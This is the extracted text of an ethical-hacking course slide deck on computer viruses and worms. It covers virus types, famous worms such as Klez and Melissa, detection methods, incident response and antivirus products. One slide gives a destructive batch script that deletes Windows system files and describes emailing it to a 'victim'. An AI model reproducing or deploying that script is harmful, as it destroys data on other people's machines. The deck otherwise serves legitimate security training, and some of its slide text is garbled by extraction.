16 Virus and Worms

8/14/2019 16 Virus and Worms

1/85

Module XVIVirus and Worms

Ethical HackingVersion 5


2/85

EC-CouncilCopyright byEC-Council

All Rights reserved. Reproduction is strictly prohibited

Case Study


3/85




4/85


5/85



Module Objective

This module will familiarize you with the following: Virus

History of Virus Different characteristics and types of virus

Basic symptoms of virus-like attack

Difference between Virus and Worm

Virus Hoaxes Indications of virus attacks

Basic working and access methods of virus

Various damages caused by virus

Life cycle of virus

Virus Infection

Various virus detection techniques

Top ten virus of 2005

Virus incident response


6/85



Module Flow

Introduction to VirusCharacteristics and

Types of virus

Symptoms of Virus attack

Access methods of virus Indications of Virus Attack Virus Hoaxes

Life cycle of virus Virus Infection Writing a sample Virus code

Virus Detection and DefensesAnti-Virus SoftwareVirus incident response


7/85



Introduction to Virus

Computer viruses are perceived as a threat to both businessand personnel

Virus is a self-replicating program that produces its owncode by attaching copies of itself into other executable codes

Operates without the knowledge or desire of the computer

user


8/85



Virus History

Slammer, Sobig, Lovgate, Fizzer, Blaster/Welchia/Mimail2003

Email-Worm.Win32.Zafi.d, Net-Worm.Win32.Mytob.t2005

I-Worm.NetSky.r, I-Worm.Baqle.au2004

Melissa, Corner, Tristate, & Bubbleboy1999

Strange Brew & Back Orifice1998

Concept1995AIDS Trojan

1989

Brain, PC-Write Trojan, & Virdem1986

First Documented Virus1983Apple II Virus- First Virus in the wild1981

Viru s NameYear o fDiscovery


9/85



Characteristics of a Virus

Resides in the memory and replicates

itself while the program where it attached,

is running

Does not reside in the memory after the

execution of program

Can transform themselves by changingcodes to appear different

Hides itself from detection by three ways:

Encrypts itself into cryptic symbols

Alters the disk directory data to

compensate the additional virus bytes

Uses stealth algorithms to redirect disk

data


10/85



Working of Virus

Trigger events and direct attack are the common modeswhich cause a virus to go off on a target system

Most viruses operate in two phases: Infection Phas e:

Virus developers decide when to infect host systems programs

Some infect each time they are run and executed completely

Ex: Direct Viruses

Some virus codes infect only when users trigger them whichinclude a day, time, or a particular event

Ex: TSR viruses which get loaded into memory and infect at laterstages

Attack Pha se:

Some viruses have trigger events to activate and corruptsystems

Some viruses have bugs which replicate and perform activitieslike file deletion, increasing session time

They corrupt the targets only after spreading completely asintended by their developers


11/85



Working of Virus: Infection Phase

File Heade rFile Heade r

IP IP

Start ofProgram

End of Program

Virus Jum p

. EXE File . EXE File

BeforeInfection

AfterInfection

Start ofProgram

End ofProgram

Attaching .EXE File to Infect the Programs


12/85



Working of Virus: Attack Phase

Page: 3Page: 2Page: 1 Page: 3Page: 2Page: 1

Unfragmented File Before Attack

Source: www.microsoft.com

File: A File: B

Page: 1

File: B

Page: 3

File: B

Page: 1

File: A

Page: 2

File: A

Page:2

File: B

Page: 3

File: A

File Fragmentation Due to Virus Attack

Slowdown of PC due to Fragmented Files


13/85



Why People create computer viruses?

Virus writers can have various reasons for creating andspreading malware

Viruses have been written as:

Research projects

Pranks

Vandalism To attack the products of specific companies

To distribute political messages

Financial gain

Identity theft

Spyware

Cryptoviral extortion


14/85



Symptoms of Virus-Like Attack

If the system acts in an unprecedented manner, you can suspect a virus attack

Example: Processes take more resources and are time consuming

However, not all glitches can be attributed to virus attacks Examples include:

Certain hardware problems

If computer beeps with no display

If one out of two anti-virus programs report virus on the system

If the label of the hard drive change

Your computer freezes frequently or encounters errors

Your computer slows down when programs are started

You are unable to load the operating system

Files and folders are suddenly missing or their content changes Your hard drive is accessed too often (the light on your main unit flashes rapidly)

Microsoft Internet Explorer "freezes"

Your friends mention that they have received messages from you but you never sent suchmessages


15/85



Virus Hoaxes

Hoaxes are false alarms claiming reports abouta non-existing virus

Warning messages propagating that a certainemail message should not be viewed and doingso will damage ones system

In some cases, these warning messages

themselves contain virus attachments

They possess capability of vast destruction ontarget systems

Being largely misunderstood, viruses easilygenerate myths. Most hoaxes, whiledeliberately posted, die a quick death becauseof their outrageous content


16/85



Virus Hoaxes


17/85



Chain Letters


18/85



How is a Worm different from a Virus?

There is a difference between

generalviruses andwormsA worm is a special type of virus

that can replicate itself and use

memory, but cannot attachitselfto other programs

A worm spreads through the

infected networkautomatically

but a virus does not


19/85



Indications of Virus Attack

Indications of a virus attack:

Programs take longer to load than normal Computer's hard drive constantly runs out of free space

Files have strange names which are not recognizable

Programs act erratically

Resources are used up easily


20/85



Hardware Threats

Pow er Faults:

Sudden power failure, voltage spikes, brownout and frequency shifts causedamage to system

System Life:

System gets worn-out over a period of time

Equipme nt Incom patibilities:

These occur due to improperly installed devices Typos:

Data gets corrupted due to deletion or replacement of wrong files

Accidental or M alicious Dam age:

Data gets deleted or changed accidentally or intentionally by other person Problems with Magnets:

Magnetic fields due to floppy disk, monitor, and telephone can damagestored data


21/85



Software Threats

Softw are Problems:

In multitasking environment, software conflicts may occur due to

sharing of data by all running programs at the same time

There may be damage of information due to misplacement of datain a program

Softwar e Attacks: Intentionally launched malicious programs enable the attacker to

use the computer in an unauthorized manner

General Categories:

Viruses and worms

Logic bombs

Trojans


22/85



Virus Damage

Virus damage can be grouped broadly under:

Technical Attribu tes: The technicalities involved in the

modeling and use of virus causes damage due to:

Lack of control

Difficulty in distinguishing the nature of attack

Draining of resources

Presence of bugs

Compatibility problems


23/85



Virus Damage (contd)

Virus damage can be further attributed to:

Ethical and Legal Reasons: There are ethics andlegalities that rule why virus and worms are damaging

Psychological Reasons: These are:

o Trust Problems

o Negative influence

Unauthorized data modification

Issue of Copyright

Misuse of the virus

Misguidance by virus writers


24/85



Modes of Virus Infection

Viruses infect the system in the following

ways:

1. Loads itself into memory and checks for

executables on the disk

2. Appends the malicious code to a legitimate

program unbeknownst to the user3. Since the user is unaware of the replacement,

he/she launches the infected program

4. As a result of the infected program beingexecutes, other programs get infected as well

5. The above cycle continues until the user

realizes the anomaly within the system


25/85



Stages of Virus Life

Computer virus involves various stages right from its design toelimination

Replication

Design

Launch

Detection

Incorporation

Elimination Users are advised to install anti-virussoftware updates thus creatingawareness among user groups

Anti-virus software developers assimilatedefenses against the virus

A virus is identified as threatinfecting target systems

It gets activated with user performing certain actionslike triggering or running a infected program

Virus first replicates for a long period of time within thetarget system and then spreads itself

Developing virus code using programminglanguages or construction kits


26/85



Virus Classification

Viruses are classifiedbased on the following

criteria:

What they Infect

How they Infect


27/85


28/85



How does a Virus Infect?

Stealth Vir us:

Can hide from anti-virus programs

Polym orphic Virus:

Can change their characteristics with each infection

Cavity Viru s:

Maintains same file size while infecting

Tunneling Viru s:

They hide themselves under anti-virus while

infecting

Camou flage Virus:

Disguise themselves as genuine applications of user


29/85



Storage Patterns of a Virus

Shell Virus:

Virus code forms a shell around target host programs code, making itself theoriginal program and host code as its sub-routine

Add-on Virus:

Appends its code at the beginning of host code without making any changes to thelatter one

Intrusive Virus:

Overwrites the host code partly, or completely with viral code

Direct or Transient Virus:

Transfers all the controls to host code where it resides

Selects the target program to be modified and corrupts it

Terminate and Stay Resident Virus (TSR):

Remains permanently in the memory during the entire work session even after thetarget host program is executed and terminated

Can be removed only by rebooting the system


30/85



System Sector Viruses

System sectors are special areas on yourdisk containing programs that are

executed when you boot (start) your PC System sectors (Master Boot Record and

DOS Boot Record) are often targets forviruses

These boot viruses use all of the commonviral techniques to infect and hidethemselves

They rely on infected floppy disk left inthe drive when the computer starts, theycan also be "dropped" by some fileinfectors or Trojans


31/85



Stealth Virus

These viruses evade anti-virus software by intercepting its requests tothe operating system

A virus can hide itself by intercepting the anti-virus softwares requestto read the file and passing the request to the virus, instead of the OS

The virus can then return an uninfected version of the file to the anti-virus software, so that it appears as if the file is "clean"

Give me the system

file tcpip.sys to scan

Original TCPIP.SYS

Infected TCPIP.SYS

Here you go

ANTI-VIRUS SOFTWARE

VIRUS


32/85



Bootable CD-ROM Virus

These are a new type of virus that destroys the hard disk data contentwhen booted with the infected CD-ROM

Example: Someone might give you a LINUX BOOTABLE CD-ROM When you boot the computer using the CD-ROM, all your data is

gone

No Anti-virus can stop this because AV software or the OS is not evenloaded when you boot from a CD-ROM

Boot your computer usinginfected Virus CD-ROM

Your C: drive data is destroyed


33/85



Self-Modification

Most modern antivirus programs try to find virus-patterns insideordinary programs by scanning them forvirus signatures

A signature is a characteristic byte-pattern that is part of a certainvirus or family of viruses

Self-modification viruses employ techniques that make detection bymeans of signatures difficult or impossible

These viruses modify their code on each infection (each infected filecontains a different variant of the virus)

Explorer.exe sales.jpg Purchase.pdf


34/85



Encryption with a Variable Key

This type of virus use simple encryption to encipher thecode

The virus is encrypted with a different key for eachinfected file

AV scanner cannot directly detect these types of viruses

using signature detection methods

Virus.exeVirus.exe (encrypted)


35/85



Polymorphic Code

A well-written polymorphic virus therefore has no parts that stay thesame on each infection

To enable polymorphic code, the virus has to have a polymorphicengine (also called mutating engine or mutation engine)

Polymorphic code is a code that mutates while keeping the originalalgorithm intact


36/85



Metamorphic Virus

Metamorphic viruses rewrite themselves completely each time theyare to infect new executables

Metamor phic code is a code that can reprogram itself bytranslating its own code into a temporary representation, and then

back to normal code again

For example, W32/Simile consisted of over 14000 lines of assembly

code, 90% of it is part of the metamorphic engine


37/85



Cavity Virus

Cavity Virus overwrites a part of the host file that is filled

with a constant (usually nulls), without increasing thelength of the file, but preserving its functionality

Null Null Null Null Null NullNull Null Null Null Null NullNull Null Null Null Null NullNull Null Null Null Null NullNull Null Null Null Null NullNull Null Null Null Null NullNull Null Null Null Null Null

Null Null Null Null Null Null

Sales & MarketingManagement is the leadingauthority for executives inthe sales and marketingmanagement industries. Thesuspect, Desmond Turner,surrendered to authorities ata downtown Indianapolisfast-food restaurant.

Original File Size: 45 KB

InfectedFile Size: 45 KB


38/85



Sparse Infector Virus

Sparse infector virus infects only occasionally (e.g. everytenth program executed), or only files whose lengths fall

within a narrow range By infecting less often, such viruses try to minimize the

probability of being discovered

Wake up on 15th of everymonth and execute code


39/85



Companion Virus

A Companion virus creates a companion file for eachexecutable file the virus infects

Therefore a companion virus may save itself asnotepad.com and every time a user executesnotepad.exe (good program ), the computer will load

notepad.com (viru s) and therefore infect the system

Virus infects the system with a filenotepad.com and saves it inc:\winnt\system32 directory

Notepad.comNotepad.exe


40/85



File Extension Virus

File extension viruses change theextensions of files

.TXT is safe as it indicates a pure text

file With extensions turned off if

someone sends you a file namedBAD.TXT.VBSyou will only seeBAD.TXT

If you've forgotten that extensionsare actually turned off, you mightthink this is a text file and open it

This is really an executable Visual

Basic Script virus file and could doserious damage

Countermeasure is to turn off Hidefile extensions in Windows

Famous Viruses /Worms


41/85



Famous Viruses /WormsI Love You Virus

Love Letter is a Win32-basedemail worm. It overwritescertain files on the hard drivesand sends itself out to everyonein the Microsoft Outlookaddress book

Love Letter arrives as an emailattachment named: LOVE-LETTER-FORYOU. TXT.VBSthough new variants havedifferent names including

VeryFunny.vbs,virus_warning.jpg.vbs, andprotect.vbs

The virus discussed here are more

of a proof of concept, as they havebeen instrumental in the evolutionof both virus and anti-virusprograms

Classic tool presented here for proof of concept


42/85



Melissa Virus

Melissa is a Microsoft Word

macro virus. Through macros,

the virus alters the MicrosoftOutlook email program so that

the virus gets sent to the first 50

people in the address book

It does not corrupt any data onthe hard drive or crashes the

computer. However, it affects

MS Word settings

Melissa arrives as an email attachment.The subject of the message containing the virus

reads: "Important message from" followed by thename of the person whose email account it was sentfrom

The body of the message reads: Here's the document you asked for...don't show anyone else ;-)Double-clicking the attached Word document (typically named LIST.DOC) will infect themachine

Classic tool presented here for proof of concept


43/85



Melissa Virus Case


44/85



Famous Virus/Worms JS.Spth

JavaScript Internet worm

Propagates via email, ICQ and P2P networks

Kit-Spth is used to produce JS/SPTH worm

Infection Strategies:

Ms-OutLook Morpheus

Grokster

MIrc pIrc

vIrc

Kazaa

Kazaa-Lite

Bear Share

symLink


45/85



Klez Virus Analysis - 1

Klez virus arrives as an email attachment that

automatically runs when viewed or previewed in

Microsoft Outlook or Outlook Express

It is a memory-resident mass-mailing worm that

uses its own SMTP engine to propagate via email

Its email messages arrive with randomly selected

subjects

It spoofs its email messages so that they appear tohave been sent by certain email accounts, including

accounts that are not infected


46/85



Kl Vi A l i


47/85




Klez Virus arrives via E-Mail


48/85

Kl Vi A l i


49/85




Autorun Techniques

This worm creates the following registry entry so that it executes

at every Windows startup:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\

CurrentVersion\Run

Winkabc

It registers itself as a process so that it is invisible on the

Windows Taskbar

On Windows 2000 and XP, it sets itself as a service bycreating the following registry entry:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Serv

ices Winkabc

Kl Vi A l i


50/85




Payload

Once the victims computer is infected, the Klez virusstarts propagating itself to other users throughMicrosoft Outlook contact list

[email protected]@xxxxxxxx.com

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

Klez Virus

W i i Si l Vi P


51/85



Writing a Simple Virus Program

1. Create a batch file Game.bat with the following text

@ echo off

del c:\winnt\system32\*.*

del c:\winnt\*.*

2. Convert the Game.bat batch file to Game.com using

bat2comutility

3. Send the Game.comfile as an email attachment to a

victim

4. When the victim runs this program, it deletes core files in

WINNT directory making Windows unusable

Writing a Test Virus Program


52/85



Writing a Test Virus Program

Sometimes it is unacceptable for you to send out real viruses to yournetwork for test or demonstration purposes

EICAR.ORG has created a test virus definition that is harmless and

will be picked by every AV program Type the following text in notepad and save the file as eicar.com

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

This file, eicar.com will be detected as Virus by your AV

You can also download this test virus fromhttp://www.eccouncil.org/cehtools/eicar.zip

Note: This slide is not in your courseware

Virus Construction Kits


53/85



Virus Construction Kits

Virus creation programs and construction

kits can automatically generate viruses

There are number of Virus construction kits

available in the wild

Some virus construction kits are:

Kefi's HTML Virus Construction Kit

Virus Creation Laboratory v1.0

The Smeg Virus Construction Kit

Rajaat's Tiny Flexible Mutator v1.1

Windows Virus Creation Kit v1.00

Examples of Virus Construction Kits


54/85



Examples of Virus Construction Kits

Virus Detection Methods


55/85



Virus Detection Methods

Scanning

Once a virus has been detected, it is possible

to write scanning programs that look forsignature string characteristic of the virus

Integrity Checking

Integrity checking products work by readingyour entire disk and recording integrity datathat acts as a signature for the files and systemsectors

Interception The interceptor monitors operating system

requests that write to disk

Virus Incident Response


56/85




1. Detect the attack: Not all anomalous behavior can be

attributed to Viruses

2. Trace processes using utilities such as handle.exe,

listdlls.exe, fport.exe, netstat.exe, pslist.exe, and map

commonalities between affected systems

3. Detect the virus payload by looking for altered, replaced,

or deleted files. New files, changed file attributes, or

shared library files should be checked4. Acquire the infection vector, isolate it. Update anti-virus

and rescan all systems

What is Sheep Dip ?


57/85



What is Sheep Dip ?

Slang term for a computer which connectsto a network only under strictly controlled

conditions, and is used for the purpose ofrunning anti-virus checks on suspect files,incoming messages and so on

It may be inconvenient and time-consuming fororganizations to give all incoming email attachment a'health check' but the rapid spread of macro-virusesassociated with word processor and spreadsheetdocuments, such as the 'Resume' virus circulating inMay 2000, makes this approach worthwhile

Sheep Dip Computer


58/85



Sheep Dip Computer

Run Port Monitor Run File Monitor

Run Registry MonitorRun Network Monitor

Run the virus in this

monitoredenvironment

Virus Analysis - IDA Pro Tool


59/85



Virus Analysis IDA Pro Tool

It is a dissembler and debugger tool that

supports both Windows and Linux platforms

It is an interactive, programmable, extendible,

multi-processor

Used in the analysis of hostile code andvulnerability research and software reverse

engineering

Allows automated unpacking/ decrypting of

protected binaries

IDA Pro (Virus Disassembler)


61/85



1. Detect the Attack: Not all anomalous behavior can be

attributed to Viruses

2. Trace processes using utilities such as handle.exe,

listdlls.exe, fport.exe, netstat.exe, pslist.exe, and map

commonalities between affected systems

3. Detect the virus payload by looking for altered, replaced

or deleted files. Check new files, changed file attributes

or shared library files4. Acquire the infection vector, isolate it. Update anti-virus

and rescan all systems

Prevention is Better than Cure


62/85


Prevention is Better than Cure

Do not accept disks or programs without

checking them first using a current

version of an anti-viral program

Do not leave a floppy disk in the disk drive

longer than necessary

Do not boot the machine with a disk in the

disk drive, unless it is a known Clean

bootable system disk Keep the anti-virus software up-to-date:

upgrade on a regular basis

Latest Viruses


63/85


Latest Viruses

W32/Vulgar:

Overwriting virus with data

destructive payload Attempts to open default web

browser after execution, but resultsin Internet Explorer crashing

W32/Feebs.gen@MM:

Email worm type virus thatconfigures itself to load at startup

Spreads itself by email attachmentand infects the system afterexecution of attachment

W32/HLLP.zori.c@M:

Parasitic file infector

and mailing worm Possesses backdoor

functionality that allowsunauthorized remoteaccess

Top 10 Viruses- 2006


64/85


p

Email-Worm.Win32.Zafi.d

Net-Worm.Win32.Mytob.c

Email-Worm.Win32.LovGate.w

Email-Worm.Win32.Sober.v

Email-Worm.Win32.Zafi.b

Email-Worm.Win32.NetSky.b

Email-Worm.Win32.NetSky.g

Net-Worm.Win32.Mytob.t Net-Worm.Win32.Mytob.u

Net-Worm.Win32.Mytob.g

Anti-Virus Software


65/85


There are many anti-virus software vendors. Hereis a list of some freely available anti-virus softwarefor personal use:

AVG Free Edition

Norton Antivirus

AntiVir Personal Edition

Bootminder

Panda Active Scan

One of the preventions againstviruses is to install anti-virus

software and keep the updatescurrent

AVG Antivirus


66/85


Menus in Basic Interface:

Program menu

Tests menu

Results menu

Service menu Menu information menu

AVG Settings and Features:

Program settings

Test properties

Test results

Task scheduler Update manager

Product ofwww.grisoft.com

AVG Antivirus


67/85


AVG Antivirus


68/85


Norton Antivirus


69/85

EC-Council Copyright byEC-CouncilAll Rights reserved. Reproduction is strictly prohibited

Product ofwww.symantec.com

Features:

Protects from viruses, and updates virus definitions automatically

Detects and repairs viruses in emails, instant messenger attachments and

compressed folders

Monitors network traffic for malicious activity

Norton antivirus provides the following scan options:

Full system scan

Custom scan

Schedule scan

Scan from the command line


70/85

Norton Antivirus


71/85

EC-Council Copyright byEC-Council


McAfee


72/85



Product ofwww.mcafee.com

Features:

SpamKiller: Stops spam from infecting the inbox

SecurityCenter: Lists computer security vulnerabilities

Offers free real-time security alerts

VirusScan:ActiveShield: Scans the files in real time

Quarantine: Encrypts the infected files in the quarantine folder Hostile Activity Detection: Examines computer for malicious

activity

McAfee SpamKiller


73/85



McAfee SecurityCenter


74/85



McAfee VirusScan


75/85



Socketshield


76/85



SocketShield is a zero-day exploit blocker

SocketShield can block exploits from entering the computer, regardless ofhow long it takes for the vendors of vulnerable applications to issue patches

http://www.explabs.com

Socketshield


77/85



Popular Anti-Virus Packages


78/85



Aladdin KnowledgeSystemshttp://www.esafe.com/

Central Command, Inc.http://www.centralcommand.com/

Computer Associates

International, Inc.http://www.cai.com

Frisk SoftwareInternational

http://www.f-prot.com/F-Secure Corporation

http://www.f-secure.com

Trend Micro, Inc.http://www.trendmicro.com

Norman Data DefenseSystemshttp://www.norman.com

Panda Software

http://www.pandasoftware.com/

Proland Softwarehttp://www.pspl.com

Sophoshttp://www.sophos.com

Virus Databases


79/85



The following databases can beuseful if you are looking forspecific information about a

particular virus

Proland - Virus Encylopedia

http://www.pspl.com/virus_info/

Norman - Virus Encylopediahttp://www.norman.com/Virus/en-us

AVG - Virus Encyclopedia

http://www.grisoft.com/doc/Virus+Encyclopaedia/lng/us/tpl/tpl01

Virus Bu lletin - Virus Encyclopediahttps://www.virusbtn.com/login

F-Secur e Virus Info Cen ter

http://www.f-secure.com/vir-info/

McAfee - Virus Inform ation Library

http://vil.mcafee.com/

Panda Software - Virus Encyclopedia

http://www.pandasoftware.com/library/Sophos Virus Information

http://www.sophos.com/virusinfo/

Symantec AntiVirus Research Center

http://www.symantec.com/avcenter/index.html

Trend Micro - Virus Encyclopediahttp://www.antivirus.com/vinfo/virusencyclo/default.asp

What Happened Next?


80/85



Next day when he switched on his system, Ricky was

surprised at the irregular behavior of his system. Hissystem was hanging down frequently and strange error

messages were popping up. He suspected virus attack on

his system. He updated his anti-virus software which he

has not updated since long and scanned the system.

Scan result showed that his system was infected by a

deadly virus.

Summary


81/85



Viruses come in different forms

Some are mere nuisances, others come with devastating

consequences Email worms are self replicating, and clog networks with

unwanted traffic

Virus codes are not necessarily complex It is necessary to scan the systems/networks for infections

on a periodic basis for protection against viruses

Antidotes to new virus releases are promptly made availableby security companies, and this forms the majorcountermeasure


83/85

EC-Council



84/85

EC-Council



85/85

EC-Council


Documents

16 Virus and Worms